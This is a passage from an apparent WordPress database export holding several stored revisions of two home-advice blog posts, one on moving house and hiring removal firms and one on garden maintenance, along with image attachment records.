speak with all the removal companies in person.</li>\r\n <li>This will enable you to get a feel for them and will also give you a chance to ask them any questions especially if you have any special requirements.</li>\r\n <li>The tried and tested way of finding a reliable removal company and receiving a genuine removals quote is by asking for testimonials or checking out their website.\r\nCheck to see if they are a part of any associations.</li>\r\n <li>The removal company you get your removal quote from should have a thorough look at your current home and belongings in order to give an accurate costing.</li>\r\n <li>If you are having various removals firms to come and visit make sure you are well prepared. They will want to look over every aspect of your property.</li>\r\n <li>Factors which will change the quote include the number of stairs in the property or to the property doors if you are moving from a flat & whether there is a lift or not. They will also want to ask about access for both ends (moving from & moving to) and is a very important factor to be taken into account.</li>\r\n <li>You will need to figure out what kind of removal service you need. For example, most companies will offer an all in one service that means they will pack and move your things, providing you with all the equipment you need.</li>\r\n <li>If the house removals company you are dealing with does not have suitable insurance, make sure you check if your home contents insurance covers your move.</li>\r\n</ul>\r\n<h3><strong>Changing your bills</strong></h3>\r\nChanging your electric and gas providers is important to make the moving and settling in process easier.\r\n\r\nNot only could this save you money, but it will avoid confusion when it comes to bills and repairs.\r\n\r\nIt may be best to get an <a href=\"https://housing-today.co.uk/blog/the-best-way-to-choose-an-electrician\" target=\"_blank\">electrician</a> in to have a look at what you need so that they can advise you on a provider that suits you, and your need best.\r\n\r\n ','Moving home checklist: tips to ease stress','','inherit','closed','closed','','180-revision-v1','','','2019-09-13 10:13:58','2019-09-13 10:13:58','',180,'https://housing-today.co.uk/blog/180-revision-v1',0,'revision','',0),(207,1,'2019-09-13 10:14:37','2019-09-13 10:14:37','<h1>Cleaning your property</h1>\r\n<h3>Eco-friendly house cleaning</h3>\r\nWe all know how important is to use Eco-friendly, pet-friendly, harmless products.\r\n\r\nCleaning a house you are intending to sell this is especially important, as you want to make your property available to accommodate as many people as possible.\r\n\r\nThis is obviously not always an easy task.\r\n<blockquote>Although there are many products on the market with big Eco-labels on them, when you read the label at the back, you find out that they are not as safe as they claim to be.</blockquote>\r\n<h3>Here are some ways to house ready for sale:</h3>\r\n<strong>Replace the equipment</strong>\r\n\r\nIf you need to change a household appliance like a stove or dishwasher, you should find a good quality replacement, not only to please the potential buyers but increase property value.\r\n\r\nLarge appliances are great electricity consumers so try to replace them with Eco ones that save energy, and money to take that strain off potential buyers, and improve your trust with them.\r\n\r\n<strong>Clean efficiently using Eco products</strong>\r\n\r\nInstead of using the big name brand cleaners that contain toxic chemicals when you come to cleaning the property, windows or glass items, you can <a href=\"https://thegreenparent.co.uk/articles/read/make-your-own-cleaning-products\" target=\"_blank\">make your own cleaning mixture</a> that is both eco-friendly and safe around children and pets.\r\n\r\nYou can even make your own mixture to polish the furniture with.\r\n<h3><img class=\"aligncenter wp-image-186 size-full\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/cleaning-3977589_960_720.jpg\" alt=\"\" width=\"960\" height=\"639\" /></h3>\r\n<h3>Redirecting your post</h3>\r\nRedirecting your post is one of the most important things you need to do when moving house, if not done, or done incorrectly it can cause problems for longer than necessary.\r\n\r\nRedirecting can seem like a difficult process, but it is a lot easier than you think.\r\n\r\nAll you need to do is go to your local post office and ask about their <a href=\"https://www.postoffice.co.uk/mail/redirection\" target=\"_blank\">redirection services</a>\r\n<h3>Finding a removals company</h3>\r\n<em>top tips for finding a removals company</em>\r\n<ul>\r\n <li>Always try to get at least 4 removal quotes from <a href=\"https://www.ktmollerremovals.com.au/about-us/\" target=\"_blank\">removals companies</a> and gather your moving quotes either from your local area or the area you are planning to move to.\r\nOnce you have your removal quotes to hand it is important to speak with all the removal companies in person.</li>\r\n <li>This will enable you to get a feel for them and will also give you a chance to ask them any questions especially if you have any special requirements.</li>\r\n <li>The tried and tested way of finding a reliable removal company and receiving a genuine removals quote is by asking for testimonials or checking out their website.\r\nCheck to see if they are a part of any associations.</li>\r\n <li>The removal company you get your removal quote from should have a thorough look at your current home and belongings in order to give an accurate costing.</li>\r\n <li>If you are having various removals firms to come and visit make sure you are well prepared. They will want to look over every aspect of your property.</li>\r\n <li>Factors which will change the quote include the number of stairs in the property or to the property doors if you are moving from a flat & whether there is a lift or not. They will also want to ask about access for both ends (moving from & moving to) and is a very important factor to be taken into account.</li>\r\n <li>You will need to figure out what kind of removal service you need. For example, most companies will offer an all in one service that means they will pack and move your things, providing you with all the equipment you need.</li>\r\n <li>If the house removals company you are dealing with does not have suitable insurance, make sure you check if your home contents insurance covers your move.</li>\r\n</ul>\r\n<h3><strong>Changing your bills</strong></h3>\r\nChanging your electric and gas providers is important to make the moving and settling in process easier.\r\n\r\nNot only could this save you money, but it will avoid confusion when it comes to bills and repairs.\r\n\r\nIt may be best to get an <a href=\"https://housing-today.co.uk/blog/the-best-way-to-choose-an-electrician\" target=\"_blank\">electrician</a> in to have a look at what you need so that they can advise you on a provider that suits you, and your need best.\r\n\r\n ','Moving home checklist: tips to ease stress','','inherit','closed','closed','','180-revision-v1','','','2019-09-13 10:14:37','2019-09-13 10:14:37','',180,'https://housing-today.co.uk/blog/180-revision-v1',0,'revision','',0),(209,1,'2019-09-23 14:50:45','2019-09-23 14:50:45','<h2>Garden Maintenance & Landscaping services you need to make the most of your outdoor space</h2>\r\n<strong>Need help trimming the hedges or mowing the lawn and make it as smooth as a carpet? </strong>\r\n\r\nThen booking a garden maintenance service that can deliver top-class garden reading services.\r\n\r\nMost gardeners will provide 7/7 services including garden maintenance, design, lawn mowing, tree lobbing, leaf clearance, garden waste clearance, jet washing, patio cleaning, driveway cleaning and gutter cleaning.\r\n\r\n<a href=\"https://www.ratedpeople.com/local-garden-maintenance\" target=\"_blank\">Garden maintenance companies</a> offer all the necessary services that you need to make the most of your outdoor space.\r\n<h3>Available to work even in bad weather</h3>\r\nYou can still get your garden revamped in the colder, wetter months. You will want to hire a company that can cater to all of your personal requirements.\r\n<ul>\r\n <li>some of the following services are common for maintenance companies to provide:\r\nWe work even on bank holidays and weekends</li>\r\n <li>We do not need a deposit for booking a service</li>\r\n <li>Ivy Removal-Despite being beautiful.</li>\r\n</ul>\r\nIvy is capable of damaging or even destroying your <a href=\"https://todayshomeowner.com/can-ivy-damage-the-brick-or-wood-on-your-home/\" target=\"_blank\">brick and tile works</a>. Due to the glossy nature of its leaves, it is also resistant to most weed killers.\r\n\r\nThis makes it hard for removal without damaging your property even further.\r\n\r\nGardeners will use special weed killers that have glyphosate in them. Those weed killers speed up the death of the plant and thus making it easier for removal.\r\n\r\nWith this in hand, no further damage can be brought to your garden.\r\n<h3>Lawn Mowing</h3>\r\nThere is nothing like a good lawn. This is why a person has to understand how grass grows. Like most plants when cut, grass tends to come together. If the cutting is done correctly.\r\n\r\nThen thousands of grass branches will come together and form the perfect lawn surface. Gardeners understand this and that’s why we call them professionals. At their hands, your lawn will look like a picture.\r\n<h3>Tree Removal and maintenance</h3>\r\n<a href=\"https://www.northbrisbanetrees.com.au/services/tree-trimming-pruning-maintenance/\" target=\"_blank\"><img class=\"alignleft wp-image-212 size-medium\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/tree-surgeon-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" /></a><a href=\"https://www.northbrisbanetrees.com.au/services/tree-trimming-pruning-maintenance/\" target=\"_blank\">Maintaining trees and shrubs</a> in your garden can be a difficult task.\r\n\r\nEspecially if they are causing problems such as blocking light from plants, or roots are damaging your home or patio.\r\n\r\nPruning the trees in your garden will make space seem so much neater and will even help with making space seem bigger.\r\n\r\nSo it important you don\'t let your trees, bushes and shrubbery grow out of hand.\r\n\r\nSome gardening services will be qualified to prune, maintain and even remove trees in your garden, to help you create a clean and tidy space outside.\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3>Seasonal Garden Care</h3>\r\nMany garden services can prepare your lawn for the chilling conditions of winter. They do that by making a top dressing service. A mixture of soil and sand is spread on the grass.\r\n\r\nThen they water it so that it can get to the bottom of the grass branches. This will feed your lawn and protect it from dying.\r\n\r\nby getting these simple services, have your garden fully transformed in a matter of days.\r\n\r\nCheck out our page on<a href=\"https://housing-today.co.uk/blog/creating-perfect-outside\" target=\"_blank\"> creating the perfect outdoors</a> to see more ways you can make the most out of your outdoor space.','Making the most of your garden','','publish','closed','closed','','making-the-most-of-your-garden','','','2019-09-24 08:08:01','2019-09-24 08:08:01','',0,'https://housing-today.co.uk/?p=209',0,'post','',0),(210,1,'2019-09-23 14:49:03','2019-09-23 14:49:03','','gardening','','inherit','closed','closed','','gardening','','','2019-09-23 14:49:03','2019-09-23 14:49:03','',209,'http://housing-today.co.uk/wp-content/uploads/2019/09/gardening.jpg',0,'attachment','image/jpeg',0),(211,1,'2019-09-23 14:49:04','2019-09-23 14:49:04','','garden-waste','','inherit','closed','closed','','garden-waste','','','2019-09-23 14:49:04','2019-09-23 14:49:04','',209,'http://housing-today.co.uk/wp-content/uploads/2019/09/garden-waste.jpg',0,'attachment','image/jpeg',0),(212,1,'2019-09-23 14:49:05','2019-09-23 14:49:05','','tree-surgeon','','inherit','closed','closed','','tree-surgeon','','','2019-09-23 14:49:05','2019-09-23 14:49:05','',209,'http://housing-today.co.uk/wp-content/uploads/2019/09/tree-surgeon.jpg',0,'attachment','image/jpeg',0),(213,1,'2019-09-23 14:49:07','2019-09-23 14:49:07','','planning permission garden','','inherit','closed','closed','','planning-permission-garden','','','2019-09-23 14:49:07','2019-09-23 14:49:07','',209,'http://housing-today.co.uk/wp-content/uploads/2019/09/planning-permission-garden.jpg',0,'attachment','image/jpeg',0),(214,1,'2019-09-23 14:49:08','2019-09-23 14:49:08','','garden-1680802_960_720','','inherit','closed','closed','','garden-1680802_960_720','','','2019-09-23 14:49:08','2019-09-23 14:49:08','',209,'http://housing-today.co.uk/wp-content/uploads/2019/09/garden-1680802_960_720.jpg',0,'attachment','image/jpeg',0),(215,1,'2019-09-23 14:49:09','2019-09-23 14:49:09','','garden','','inherit','closed','closed','','garden','','','2019-09-23 14:49:09','2019-09-23 14:49:09','',209,'http://housing-today.co.uk/wp-content/uploads/2019/09/garden.jpg',0,'attachment','image/jpeg',0),(216,1,'2019-09-23 14:49:10','2019-09-23 14:49:10','','water-sustainability','','inherit','closed','closed','','water-sustainability','','','2019-09-23 14:49:10','2019-09-23 14:49:10','',209,'http://housing-today.co.uk/wp-content/uploads/2019/09/water-sustainability.jpg',0,'attachment','image/jpeg',0),(217,1,'2019-09-23 14:50:45','2019-09-23 14:50:45','<h2>Garden Maintenance & Landscaping services you need to make the most of your outdoor space</h2>\r\n<strong>Need help trimming the hedges or mowing the lawn and make it as smooth as a carpet? </strong>\r\n\r\nThen booking a garden maintenance service that can deliver top-class garden reading services.\r\n\r\nMost gardeners will provide 7/7 services including garden maintenance, design, lawn mowing, tree lobbing, leaf clearance, garden waste clearance, jet washing, patio cleaning, driveway cleaning and gutter cleaning.\r\n\r\n<a href=\"https://www.ratedpeople.com/local-garden-maintenance\" target=\"_blank\">Garden maintenance companies</a> offer all the necessary services that you need to make the most of your outdoor space.\r\n<h3>Available to work even in bad weather</h3>\r\nYou can still get your garden revamped in the colder, wetter months. You will want to hire a company that can cater to all of your personal requirements.\r\n<ul>\r\n <li>some of the following services are common for maintenance companies to provide:\r\nWe work even on bank holidays and weekends</li>\r\n <li>We do not need a deposit for booking a service</li>\r\n <li>Ivy Removal-Despite being beautiful.</li>\r\n</ul>\r\nIvy is capable of damaging or even destroying your <a href=\"https://todayshomeowner.com/can-ivy-damage-the-brick-or-wood-on-your-home/\" target=\"_blank\">brick and tile works</a>. Due to the glossy nature of its leaves, it is also resistant to most weed killers.\r\n\r\nThis makes it hard for removal without damaging your property even further.\r\n\r\nGardeners will use special weed killers that have glyphosate in them. Those weed killers speed up the death of the plant and thus making it easier for removal.\r\n\r\nWith this in hand, no further damage can be brought to your garden.\r\n<h3>Lawn Mowing</h3>\r\nThere is nothing like a good lawn. This is why a person has to understand how grass grows. Like most plants when cut, grass tends to come together. If the cutting is done correctly.\r\n\r\nThen thousands of grass branches will come together and form the perfect lawn surface. Gardeners understand this and that’s why we call them professionals.\r\n\r\nAt their hands, your lawn will look like a picture.\r\n<h3>Tree Removal and maintenance</h3>\r\n<a href=\"https://www.northbrisbanetrees.com.au/services/tree-trimming-pruning-maintenance/\" target=\"_blank\">Maintaining trees and shrubs</a><a href=\"https://www.northbrisbanetrees.com.au/services/tree-trimming-pruning-maintenance/\" target=\"_blank\"><img class=\"alignleft wp-image-212 size-medium\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/tree-surgeon-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" /></a> in your garden can be a difficult task. Especially if they are causing problems such as blocking light for the growth of other plants, or roots are damaging your home or patio.\r\n\r\nPruning the trees in your garden will make space seem so much neater and will even help with making space seem bigger. So it important you don\'t let your trees, bushes and shrubbery grow out of hand.\r\n\r\nSome gardening services will be qualified to prune, maintain and even remove trees in your garden, to help you create a clean and tidy space outside.\r\n<h3>Seasonal Garden Care</h3>\r\nMany garden services can prepare your lawn for the chilling conditions of winter. They do that by making a top dressing service. A mixture of soil and sand is spread on the grass.\r\n\r\nThen they water it so that it can get to the bottom of the grass branches. This will feed your lawn and protect it from dying.\r\n\r\nby getting these simple services, have your garden fully transformed in a matter of days.\r\n\r\nCheck out our page on<a href=\"https://housing-today.co.uk/blog/creating-perfect-outside\" target=\"_blank\"> creating the perfect outdoors</a> to see more ways you can make the most out of your outdoor space.','Making the most of your garden','','inherit','closed','closed','','209-revision-v1','','','2019-09-23 14:50:45','2019-09-23 14:50:45','',209,'https://housing-today.co.uk/blog/209-revision-v1',0,'revision','',0),(218,1,'2019-09-23 14:51:17','2019-09-23 14:51:17','<h2>Garden Maintenance & Landscaping services you need to make the most of your outdoor space</h2>\r\n<strong>Need help trimming the hedges or mowing the lawn and make it as smooth as a carpet? </strong>\r\n\r\nThen booking a garden maintenance service that can deliver top-class garden reading services.\r\n\r\nMost gardeners will provide 7/7 services including garden maintenance, design, lawn mowing, tree lobbing, leaf clearance, garden waste clearance, jet washing, patio cleaning, driveway cleaning and gutter cleaning.\r\n\r\n<a href=\"https://www.ratedpeople.com/local-garden-maintenance\" target=\"_blank\">Garden maintenance companies</a> offer all the necessary services that you need to make the most of your outdoor space.\r\n<h3>Available to work even in bad weather</h3>\r\nYou can still get your garden revamped in the colder, wetter months. You will want to hire a company that can cater to all of your personal requirements.\r\n<ul>\r\n <li>some of the following services are common for maintenance companies to provide:\r\nWe work even on bank holidays and weekends</li>\r\n <li>We do not need a deposit for booking a service</li>\r\n <li>Ivy Removal-Despite being beautiful.</li>\r\n</ul>\r\nIvy is capable of damaging or even destroying your <a href=\"https://todayshomeowner.com/can-ivy-damage-the-brick-or-wood-on-your-home/\" target=\"_blank\">brick and tile works</a>. Due to the glossy nature of its leaves, it is also resistant to most weed killers.\r\n\r\nThis makes it hard for removal without damaging your property even further.\r\n\r\nGardeners will use special weed killers that have glyphosate in them. Those weed killers speed up the death of the plant and thus making it easier for removal.\r\n\r\nWith this in hand, no further damage can be brought to your garden.\r\n<h3>Lawn Mowing</h3>\r\nThere is nothing like a good lawn. This is why a person has to understand how grass grows. Like most plants when cut, grass tends to come together. If the cutting is done correctly.\r\n\r\nThen thousands of grass branches will come together and form the perfect lawn surface. Gardeners understand this and that’s why we call them professionals.\r\n\r\nAt their hands, your lawn will look like a picture.\r\n<h3>Tree Removal and maintenance</h3>\r\n<a href=\"https://www.northbrisbanetrees.com.au/services/tree-trimming-pruning-maintenance/\" target=\"_blank\">Maintaining trees and shrubs</a><a href=\"https://www.northbrisbanetrees.com.au/services/tree-trimming-pruning-maintenance/\" target=\"_blank\"><img class=\"alignleft wp-image-212 size-medium\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/tree-surgeon-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" /></a> in your garden can be a difficult task. Especially if they are causing problems such as blocking light for the growth of other plants, or roots are damaging your home or patio.\r\n\r\nPruning the trees in your garden will make space seem so much neater and will even help with making space seem bigger. So it important you don\'t let your trees, bushes and shrubbery grow out of hand.\r\n\r\nSome gardening services will be qualified to prune, maintain and even remove trees in your garden, to help you create a clean and tidy space outside.\r\n<h3></h3>\r\n<h3>Seasonal Garden Care</h3>\r\nMany garden services can prepare your lawn for the chilling conditions of winter. They do that by making a top dressing service. A mixture of soil and sand is spread on the grass.\r\n\r\nThen they water it so that it can get to the bottom of the grass branches. This will feed your lawn and protect it from dying.\r\n\r\nby getting these simple services, have your garden fully transformed in a matter of days.\r\n\r\nCheck out our page on<a href=\"https://housing-today.co.uk/blog/creating-perfect-outside\" target=\"_blank\"> creating the perfect outdoors</a> to see more ways you can make the most out of your outdoor space.','Making the most of your garden','','inherit','closed','closed','','209-revision-v1','','','2019-09-23 14:51:17','2019-09-23 14:51:17','',209,'https://housing-today.co.uk/blog/209-revision-v1',0,'revision','',0),(219,1,'2019-09-23 14:51:40','2019-09-23 14:51:40','<h2>Garden Maintenance & Landscaping services you need to make the most of your outdoor space</h2>\r\n<strong>Need help trimming the hedges or mowing the lawn and make it as smooth as a carpet? </strong>\r\n\r\nThen booking a garden maintenance service that can deliver top-class garden reading services.\r\n\r\nMost gardeners will provide 7/7 services including garden maintenance, design, lawn mowing, tree lobbing, leaf clearance, garden waste clearance, jet washing, patio cleaning, driveway cleaning and gutter cleaning.\r\n\r\n<a href=\"https://www.ratedpeople.com/local-garden-maintenance\" target=\"_blank\">Garden maintenance companies</a> offer all the necessary services that you need to make the most of your outdoor space.\r\n<h3>Available to work even in bad weather</h3>\r\nYou can still get your garden revamped in the colder, wetter months. You will want to hire a company that can cater to all of your personal requirements.\r\n<ul>\r\n <li>some of the following services are common for maintenance companies to provide:\r\nWe work even on bank holidays and weekends</li>\r\n <li>We do not need a deposit for booking a service</li>\r\n <li>Ivy Removal-Despite being beautiful.</li>\r\n</ul>\r\nIvy is capable of damaging or even destroying your <a href=\"https://todayshomeowner.com/can-ivy-damage-the-brick-or-wood-on-your-home/\" target=\"_blank\">brick and tile works</a>. Due to the glossy nature of its leaves, it is also resistant to most weed killers.\r\n\r\nThis makes it hard for removal without damaging your property even further.\r\n\r\nGardeners will use special weed killers that have glyphosate in them. Those weed killers speed up the death of the plant and thus making it easier for removal.\r\n\r\nWith this in hand, no further damage can be brought to your garden.\r\n<h3>Lawn Mowing</h3>\r\nThere is nothing like a good lawn. This is why a person has to understand how grass grows. Like most plants when cut, grass tends to come together. If the cutting is done correctly.\r\n\r\nThen thousands of grass branches will come together and form the perfect lawn surface. Gardeners understand this and that’s why we call them professionals.\r\n\r\nAt their hands, your lawn will look like a picture.\r\n<h3>Tree Removal and maintenance</h3>\r\n<a href=\"https://www.northbrisbanetrees.com.au/services/tree-trimming-pruning-maintenance/\" target=\"_blank\">Maintaining trees and shrubs</a><a href=\"https://www.northbrisbanetrees.com.au/services/tree-trimming-pruning-maintenance/\" target=\"_blank\"><img class=\"alignleft wp-image-212 size-medium\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/tree-surgeon-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" /></a> in your garden can be a difficult task.\r\n\r\nEspecially if they are causing problems such as blocking light for the growth of other plants, or roots are damaging your home or patio.\r\n\r\nPruning the trees in your garden will make space seem so much neater and will even help with making space seem bigger.\r\n\r\nSo it important you don\'t let your trees, bushes and shrubbery grow out of hand.\r\n\r\nSome gardening services will be qualified to prune, maintain and even remove trees in your garden, to help you create a clean and tidy space outside.\r\n<h3></h3>\r\n<h3>Seasonal Garden Care</h3>\r\nMany garden services can prepare your lawn for the chilling conditions of winter. They do that by making a top dressing service. A mixture of soil and sand is spread on the grass.\r\n\r\nThen they water it so that it can get to the bottom of the grass branches. This will feed your lawn and protect it from dying.\r\n\r\nby getting these simple services, have your garden fully transformed in a matter of days.\r\n\r\nCheck out our page on<a href=\"https://housing-today.co.uk/blog/creating-perfect-outside\" target=\"_blank\"> creating the perfect outdoors</a> to see more ways you can make the most out of your outdoor space.','Making the most of your garden','','inherit','closed','closed','','209-revision-v1','','','2019-09-23 14:51:40','2019-09-23 14:51:40','',209,'https://housing-today.co.uk/blog/209-revision-v1',0,'revision','',0),(220,1,'2019-09-23 14:52:39','2019-09-23 14:52:39','<h2>Garden Maintenance & Landscaping services you need to make the most of your outdoor space</h2>\r\n<strong>Need help trimming the hedges or mowing the lawn and make it as smooth as a carpet? </strong>\r\n\r\nThen booking a garden maintenance service that can deliver top-class garden reading services.\r\n\r\nMost gardeners will provide 7/7 services including garden maintenance, design, lawn mowing, tree lobbing, leaf clearance, garden waste clearance, jet washing, patio cleaning, driveway cleaning and gutter cleaning.\r\n\r\n<a href=\"https://www.ratedpeople.com/local-garden-maintenance\" target=\"_blank\">Garden maintenance companies</a> offer all the necessary services that you need to make the most of your outdoor space.\r\n<h3>Available to work even in bad weather</h3>\r\nYou can still get your garden revamped in the colder, wetter months. You will want to hire a company that can cater to all of your personal requirements.\r\n<ul>\r\n <li>some of the following services are common for maintenance companies to provide:\r\nWe work even on bank holidays and weekends</li>\r\n <li>We do not need a deposit for booking a service</li>\r\n <li>Ivy Removal-Despite being beautiful.</li>\r\n</ul>\r\nIvy is capable of damaging or even destroying your <a href=\"https://todayshomeowner.com/can-ivy-damage-the-brick-or-wood-on-your-home/\" target=\"_blank\">brick and tile works</a>. Due to the glossy nature of its leaves, it is also resistant to most weed killers.\r\n\r\nThis makes it hard for removal without damaging your property even further.\r\n\r\nGardeners will use special weed killers that have glyphosate in them. Those weed killers speed up the death of the plant and thus making it easier for removal.\r\n\r\nWith this in hand, no further damage can be brought to your garden.\r\n<h3>Lawn Mowing</h3>\r\nThere is nothing like a good lawn. This is why a person has to understand how grass grows. Like most plants when cut, grass tends to come together. If the cutting is done correctly.\r\n\r\nThen thousands of grass branches will come together and form the perfect lawn surface.\r\n<blockquote>Gardeners understand this and that’s why we call them professionals.</blockquote>\r\nAt their hands, your lawn will look like a picture.\r\n<h3>Tree Removal and maintenance</h3>\r\n<a href=\"https://www.northbrisbanetrees.com.au/services/tree-trimming-pruning-maintenance/\" target=\"_blank\">Maintaining trees and shrubs</a><a href=\"https://www.northbrisbanetrees.com.au/services/tree-trimming-pruning-maintenance/\" target=\"_blank\"><img class=\"alignleft wp-image-212 size-medium\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/tree-surgeon-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" /></a> in your garden can be a difficult task.\r\n\r\nEspecially if they are causing problems such as blocking light for the growth of other plants, or roots are damaging your home or patio.\r\n\r\nPruning the trees in your garden will make space seem so much neater and will even help with making space seem bigger.\r\n\r\nSo it important you don\'t let your trees, bushes and shrubbery grow out of hand.\r\n\r\nSome gardening services will be qualified to prune, maintain and even remove trees in your garden, to help you create a clean and tidy space outside.\r\n<h3></h3>\r\n<h3>Seasonal Garden Care</h3>\r\nMany garden services can prepare your lawn for the chilling conditions of winter. They do that by making a top dressing service. A mixture of soil and sand is spread on the grass.\r\n\r\nThen they water it so that it can get to the bottom of the grass branches. This will feed your lawn and protect it from dying.\r\n\r\nby getting these simple services, have your garden fully transformed in a matter of days.\r\n\r\nCheck out our page on<a href=\"https://housing-today.co.uk/blog/creating-perfect-outside\" target=\"_blank\"> creating the perfect outdoors</a> to see more ways you can make the most out of your outdoor space.','Making the most of your garden','','inherit','closed','closed','','209-revision-v1','','','2019-09-23 14:52:39','2019-09-23 14:52:39','',209,'https://housing-today.co.uk/blog/209-revision-v1',0,'revision','',0),(221,1,'2019-09-23 14:53:29','2019-09-23 14:53:29','<h2>Garden Maintenance & Landscaping services you need to make the most of your outdoor space</h2>\r\n<strong>Need help trimming the hedges or mowing the lawn and make it as smooth as a carpet? </strong>\r\n\r\nThen booking a garden maintenance service that can deliver top-class garden reading services.\r\n\r\nMost gardeners will provide 7/7 services including garden maintenance, design, lawn mowing, tree lobbing, leaf clearance, garden waste clearance, jet washing, patio cleaning, driveway cleaning and gutter cleaning.\r\n\r\n<a href=\"https://www.ratedpeople.com/local-garden-maintenance\" target=\"_blank\">Garden maintenance companies</a> offer all the necessary services that you need to make the most of your outdoor space.\r\n<h3>Available to work even in bad weather</h3>\r\nYou can still get your garden revamped in the colder, wetter months. You will want to hire a company that can cater to all of your personal requirements.\r\n<ul>\r\n <li>some of the following services are common for maintenance companies to provide:\r\nWe work even on bank holidays and weekends</li>\r\n <li>We do not need a deposit for booking a service</li>\r\n <li>Ivy Removal-Despite being beautiful.</li>\r\n</ul>\r\nIvy is capable of damaging or even destroying your <a href=\"https://todayshomeowner.com/can-ivy-damage-the-brick-or-wood-on-your-home/\" target=\"_blank\">brick and tile works</a>. Due to the glossy nature of its leaves, it is also resistant to most weed killers.\r\n\r\nThis makes it hard for removal without damaging your property even further.\r\n\r\nGardeners will use special weed killers that have glyphosate in them. Those weed killers speed up the death of the plant and thus making it easier for removal.\r\n\r\nWith this in hand, no further damage can be brought to your garden.\r\n<h3>Lawn Mowing</h3>\r\nThere is nothing like a good lawn. This is why a person has to understand how grass grows. Like most plants when cut, grass tends to come together. If the cutting is done correctly.\r\n\r\nThen thousands of grass branches will come together and form the perfect lawn surface. Gardeners understand this and that’s why we call them professionals.\r\n\r\nAt their hands, your lawn will look like a picture.\r\n<h3>Tree Removal and maintenance</h3>\r\n<a href=\"https://www.northbrisbanetrees.com.au/services/tree-trimming-pruning-maintenance/\" target=\"_blank\">Maintaining trees and shrubs</a><a href=\"https://www.northbrisbanetrees.com.au/services/tree-trimming-pruning-maintenance/\" target=\"_blank\"><img class=\"alignleft wp-image-212 size-medium\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/tree-surgeon-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" /></a> in your garden can be a difficult task.\r\n\r\nEspecially if they are causing problems such as blocking light for the growth of other plants, or roots are damaging your home or patio.\r\n\r\nPruning the trees in your garden will make space seem so much neater and will even help with making space seem bigger.\r\n\r\nSo it important you don\'t let your trees, bushes and shrubbery grow out of hand.\r\n\r\nSome gardening services will be qualified to prune, maintain and even remove trees in your garden, to help you create a clean and tidy space outside.\r\n<h3></h3>\r\n<h3>Seasonal Garden Care</h3>\r\nMany garden services can prepare your lawn for the chilling conditions of winter. They do that by making a top dressing service. A mixture of soil and sand is spread on the grass.\r\n\r\nThen they water it so that it can get to the bottom of the grass branches. This will feed your lawn and protect it from dying.\r\n\r\nby getting these simple services, have your garden fully transformed in a matter of days.\r\n\r\nCheck out our page on<a href=\"https://housing-today.co.uk/blog/creating-perfect-outside\" target=\"_blank\"> creating the perfect outdoors</a> to see more ways you can make the most out of your outdoor space.','Making the most of your garden','','inherit','closed','closed','','209-revision-v1','','','2019-09-23 14:53:29','2019-09-23 14:53:29','',209,'https://housing-today.co.uk/blog/209-revision-v1',0,'revision','',0),(222,1,'2019-09-23 14:56:08','2019-09-23 14:56:08','<h2>Garden Maintenance & Landscaping services you need to make the most of your outdoor space</h2>\r\n<strong>Need help trimming the hedges or mowing the lawn and make it as smooth as a carpet? </strong>\r\n\r\nThen booking a garden maintenance service that can deliver top-class garden reading services.\r\n\r\nMost gardeners will provide 7/7 services including garden maintenance, design, lawn mowing, tree lobbing, leaf clearance, garden waste clearance, jet washing, patio cleaning, driveway cleaning and gutter cleaning.\r\n\r\n<a href=\"https://www.ratedpeople.com/local-garden-maintenance\" target=\"_blank\">Garden maintenance companies</a> offer all the necessary services that you need to make the most of your outdoor space.\r\n<h3>Available to work even in bad weather</h3>\r\nYou can still get your garden revamped in the colder, wetter months. You will want to hire a company that can cater to all of your personal requirements.\r\n<ul>\r\n <li>some of the following services are common for maintenance companies to provide:\r\nWe work even on bank holidays and weekends</li>\r\n <li>We do not need a deposit for booking a service</li>\r\n <li>Ivy Removal-Despite being beautiful.</li>\r\n</ul>\r\nIvy is capable of damaging or even destroying your <a href=\"https://todayshomeowner.com/can-ivy-damage-the-brick-or-wood-on-your-home/\" target=\"_blank\">brick and tile works</a>. Due to the glossy nature of its leaves, it is also resistant to most weed killers.\r\n\r\nThis makes it hard for removal without damaging your property even further.\r\n\r\nGardeners will use special weed killers that have glyphosate in them. Those weed killers speed up the death of the plant and thus making it easier for removal.\r\n\r\nWith this in hand, no further damage can be brought to your garden.\r\n<h3>Lawn Mowing</h3>\r\nThere is nothing like a good lawn. This is why a person has to understand how grass grows. Like most plants when cut, grass tends to come together. If the cutting is done correctly.\r\n\r\nThen thousands of grass branches will come together and form the perfect lawn surface. Gardeners understand this and that’s why we call them professionals. At their hands, your lawn will look like a picture.\r\n<h3><a href=\"https://www.northbrisbanetrees.com.au/services/tree-trimming-pruning-maintenance/\" target=\"_blank\"><img class=\"alignleft wp-image-212 size-medium\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/09/tree-surgeon-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" /></a>Tree Removal and maintenance</h3>\r\n<a href=\"https://www.northbrisbanetrees.com.au/services/tree-trimming-pruning-maintenance/\" target=\"_blank\">Maintaining trees and shrubs</a> in your garden can be a difficult task.\r\n\r\nEspecially if they are causing problems such as blocking light for the growth of other plants, or roots are damaging your home or patio.\r\n\r\nPruning the trees in your garden will make space seem so much neater and will even help with making space seem bigger.\r\n\r\nSo it important you don\'t let your trees, bushes and shrubbery grow out of hand.\r\n\r\nSome gardening services will be qualified to prune, maintain and even remove trees in your garden, to help you create a clean and tidy space outside.\r\n<h3></h3>\r\n<h3>Seasonal Garden Care</h3>\r\nMany garden services can prepare your lawn for the chilling conditions of winter. They do that by making a top dressing service. A mixture of soil and sand is spread on the grass.\r\n\r\nThen they water it so that it can get to the bottom of the grass branches. This will feed your lawn and protect it from dying.\r\n\r\nby getting these simple services, have your garden fully transformed in a matter of days.\r\n\r\nCheck out our page on<a href=\"https://housing-today.co.uk/blog/creating-perfect-outside\" target=\"_blank\"> creating the 